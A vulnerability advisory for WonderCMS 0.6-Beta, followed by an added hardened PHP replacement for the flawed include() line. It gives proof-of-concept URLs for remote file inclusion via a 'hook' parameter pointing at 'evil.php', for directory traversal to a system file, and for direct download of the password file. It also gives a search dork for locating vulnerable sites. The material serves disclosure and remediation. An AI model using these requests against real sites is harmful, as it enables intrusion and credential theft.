Wonder CMS 0.6-Beta File Inclusion / Traversal / Disclosure

Published: 2015.06.19
Credit: indoushka
Risk: Medium
CWE: CWE-22
CVE: N/A
Local: No
Remote: Yes

| # Title : WonderCMS 0.6-Beta Multi Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : ©2015 Your website | Powered by WonderCMS | Login
| # Tested on: windows 8.1 Français V.(Pro)
| # Download : http://wondercms.com/
=======================================

File inclusion :

Line 17 : <?php if(isset($_REQUEST['hook']))include($_REQUEST['hook']); ?>

http://127.0.0.1/wondercms/js/editInplace.php?hook=http://127.0.0.1/evil.php

Directory traversal :

Line 17 : if(changing)return;

http://127.0.0.1//wondercms/js/editInplace.php?hook=../../../../../../../../../../windows/win.ini

Password Disclosure :

http://127.0.0.1/wondercms/files/password

Greetz :
jericho http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net
---------------------------------------------------------------------------------------------------------------
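The root cause of both the file inclusion and the directory traversal findings is the quoted line 17, which passes a request parameter straight to include(). The following is an added example of a hardened replacement for that pattern; it is not WonderCMS code, and it assumes hook files live in a fixed server-side directory (hypothetical $hookDir) and that the set of valid hook names is known in advance (constructed ALLOWED_HOOKS list).

```php
<?php
// Added example, not WonderCMS code: a hardened replacement for the
// "include($_REQUEST['hook'])" pattern quoted in the advisory.
// Assumptions: hook files live in a fixed directory ($hookDir, hypothetical)
// and the valid hook names are known ahead of time (ALLOWED_HOOKS, constructed).

declare(strict_types=1);

// Constructed allowlist: the only hook names this endpoint will ever load.
const ALLOWED_HOOKS = ['header', 'footer', 'sidebar'];

/**
 * Resolve a user-supplied hook name to a file path inside $hookDir.
 * Returns null when the name is not on the allowlist, the file does not
 * exist, or the resolved path escapes $hookDir.
 */
function resolveHook(string $hookDir, string $hook): ?string
{
    // 1. Reject anything that is not a plain allowlisted name. This stops
    //    "../" sequences, absolute paths and "http://" URLs before any
    //    filesystem or network access happens.
    if (!in_array($hook, ALLOWED_HOOKS, true)) {
        return null;
    }

    // 2. Build the path from a server-controlled directory and a fixed
    //    extension, so the caller never chooses the file name or suffix.
    $base = realpath($hookDir);
    $candidate = realpath($hookDir . DIRECTORY_SEPARATOR . $hook . '.php');
    if ($base === false || $candidate === false) {
        return null; // hook directory or hook file does not exist
    }

    // 3. Defence in depth: confirm the resolved file is still inside $hookDir
    //    (realpath has already collapsed any symlinks and ".." components).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Usage in place of the original one-liner.
$hookDir = __DIR__ . '/hooks';
if (isset($_REQUEST['hook'])) {
    $file = resolveHook($hookDir, (string) $_REQUEST['hook']);
    if ($file === null) {
        http_response_code(400);
        exit('invalid hook');
    }
    include $file;
}
```

The allowlist check is what actually closes the hole; the realpath prefix comparison is a second layer in case the allowlist is later loosened. Independently of the code fix, setting allow_url_include=Off in php.ini removes remote inclusion for the whole installation, and the Password Disclosure finding is best addressed by keeping the password file outside the web root (or denying direct access to the files/ directory in the web server configuration) rather than by any change to editInplace.php.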


Copyright 2017, cxsecurity.com